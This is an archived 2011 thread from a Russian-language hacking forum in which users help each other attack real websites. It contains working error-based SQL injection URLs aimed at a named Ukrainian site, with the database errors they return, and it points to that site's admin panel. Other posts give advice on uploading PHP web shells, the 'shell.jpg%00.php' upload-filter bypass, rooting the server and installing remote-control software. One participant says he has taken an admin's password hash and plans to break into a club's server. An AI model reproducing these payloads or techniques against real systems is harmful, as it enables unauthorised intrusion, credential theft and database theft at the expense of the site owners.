ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.11.2011, 02:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от None
http://spotters.net.ua/file/?id=1
что тут можно сделать?
|
|
|
|
19.11.2011, 02:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
7046
Репутация:
1
|
|
Сообщение от OxoTnik
OxoTnik said:
что тут можно сделать?
http://spotters.net.ua/file/?id=-1
например сделать как показано выше и раскручивать
Apache/2.2.21 (Unix) PHP5/5.2.14 with Suhosin-Patch mod_rpaf/0.6
|
|
|
|
19.11.2011, 02:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
7046
Репутация:
1
|
|
Сообщение от lion-art
lion-art said:
http://spotters.net.ua/file/?id=-1
например сделать как показано выше и раскручивать
Apache/2.2.21 (Unix) PHP5/5.2.14 with Suhosin-Patch mod_rpaf/0.6
вот еще:
http://spotters.net.ua/admin/
полезно будет.
ну и напоследок вот:
http://spotters.net.ua/news/entry/?545'
http://spotters.net.ua/news/entry/?id=1+or+1+group+by+concat(version(),floor(rand(0) *2)%20)having+min(0)+or+1--+
MySQL ERROR: Duplicate entry '5.0.89-log1' for key 1
SQL error
5я ветка
настроение задорное лови пока добрый
начинай с этого запроса
http://spotters.net.ua/news/entry/?id=1+or+1+group%20by%20concat((select%20concat(0x 3a,table_name,0x3a)%20from%20information_schema.ta bles%20limit%2017,1),floor(rand(0)*2))%20having%20 min(0)%20or%201+--+
Duplicate entry ':admin_settings:1' for key 1
перебор лимитом и все получится
ну и что бы вопросов совсем не возникло перебор по столбцам делается так:
http://spotters.net.ua/news/entry/?id=1+or+1+group%20by%20concat((select%20concat(0x 3a,column_name,0x3a)%20from%20information_schema.c olumns%20where%20table_name='admin_settings'%20lim it%200,1),floor(rand(0)*2))%20having%20min(0)%20or %201+--+
|
|
|
|
19.11.2011, 11:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
42706
Репутация:
6
|
|
Можно ли из бд вытащить пасс от фтп?
Имеется уязвимый сайт,скулю крутил через Havij,сайт имеет Pure Ftpd,пасс отдельно храница или в бд?Шелл залить нужно,права доступа только на SELECT команды
Еще 1 вопрос:Если добровольно жертва* загрузит шелл себе на пк можно ли будет приконектица?
К примеру скачал шелл,закинул его в диск C,теперь чтобы приконектица просто ввести ip/shell.php? или что?
|
|
|
|
19.11.2011, 12:37
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от alerondel
alerondel said:
Можно ли из бд вытащить пасс от фтп?
Имеется уязвимый сайт,скулю крутил через Havij,сайт имеет Pure Ftpd,пасс отдельно храница или в бд?Шелл залить нужно,права доступа только на SELECT команды
Еще 1 вопрос:Если добровольно жертва* загрузит шелл себе на пк можно ли будет приконектица?
К примеру скачал шелл,закинул его в диск C,теперь чтобы приконектица просто ввести ip/shell.php? или что?
1.пассы от фтп в БД не хранятся ..за оооочень редким исключением
2.ты имеешь в виду пхп шелл? подумай сам и ответь себе на вопрос..ключевое слово пхп
|
|
|
19.11.2011, 20:19
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Сообщение от alerondel
alerondel said:
Можно ли из бд вытащить пасс от фтп?
Имеется уязвимый сайт,скулю крутил через Havij,сайт имеет Pure Ftpd,пасс отдельно храница или в бд?Шелл залить нужно,права доступа только на SELECT команды
Еще 1 вопрос:Если добровольно жертва* загрузит шелл себе на пк можно ли будет приконектица?
К примеру скачал шелл,закинул его в диск C,теперь чтобы приконектица просто ввести ip/shell.php? или что?
Тебе сначала нужно проникнуть в админку, оттуда залить шелл или через SQL-injection или другими возможными способами. Потом ты уже рутишь сервер / заливаешь на сервер radmin и управляешь им. А шелл допустим ты подкинул жертве...но шелл же написан на php! как он запуститься? чтобы запустился нужен .bat или .exe
|
|
|
|
19.11.2011, 22:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
42706
Репутация:
6
|
|
Ясно спасибо за советы.Достал хеш самого админа,пароль мудреной ну да ладно,по слухам у него он 1 и тот же на всех его аккаунтах и прочих сервисах,почты.
+
Почему про шелл спрашивал потому что есть доступ в его клуб и 1 из Пк там сервер,хочу туда залезть,нужна бд.
|
|
|
|
20.11.2011, 15:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Залил шелл
_http://site.com/images/shell.php.lalalajpg
Он не работает, и странице выводится вот это
http://i28.fastpic.ru/big/2011/1120/03/8f12609e03abcc163a5e65951a2e3d03.png
как сделать так чтобы шелл заработал?
|
|
|
|
20.11.2011, 15:26
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Сообщение от er9j6@
er9j6@ said:
Залил шелл
_http://site.com/images/shell.php.lalalajpg
Он не работает, и странице выводится вот это
http://i28.fastpic.ru/big/2011/1120/03/8f12609e03abcc163a5e65951a2e3d03.png
как сделать так чтобы шелл заработал?
1) попробуй через инклуд(если есть)
2) попробуй залить так shell.jpg%00.php
|
|
|
|
20.11.2011, 15:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от aydin-ka
aydin-ka said:
1) попробуй через инклуд(если есть)
2) попробуй залить так shell.jpg%00.php
Инклуда нет, и вариант shell.jpg%00.php - не проходит
js выводит ошибку:
Only JPEG files allowed
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
